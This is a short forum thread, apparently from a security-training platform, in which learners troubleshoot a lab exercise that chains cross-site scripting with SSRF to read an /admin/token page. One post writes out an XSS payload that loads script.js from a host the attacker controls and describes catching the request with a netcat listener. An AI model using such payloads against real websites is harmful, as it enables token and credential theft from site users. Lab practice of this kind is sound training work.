Forum Discussion

Bronze I

11 months ago

Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

help & support

CyberSharpe
10 months ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.

natelott

Bronze I

11 months ago

Having the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns html from /dashboard.

Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.

Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>

Forum Discussion

Cross-Site Scripting: Ep.6 – Further Exploitation

Featured Places

Help & Support Forum

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

Pen Test CTFs: Jinja2 Exploitation

Zeek Ep 4 Scripting

Human Connection Challenge: Season 1 – Web Exploitation - XSS

Fundamental AI Algorithms: Decision Trees Script Detection Question 6

Recent Discussions

A Letter to Santa

GuardDuty: Demonstrate Your Skills

Hack Your First Web App: Ep.6 - Hydra

Foundational Static Analysis: API Analysis step 10

AI: Plugin Injection - Demonstrate Your Skills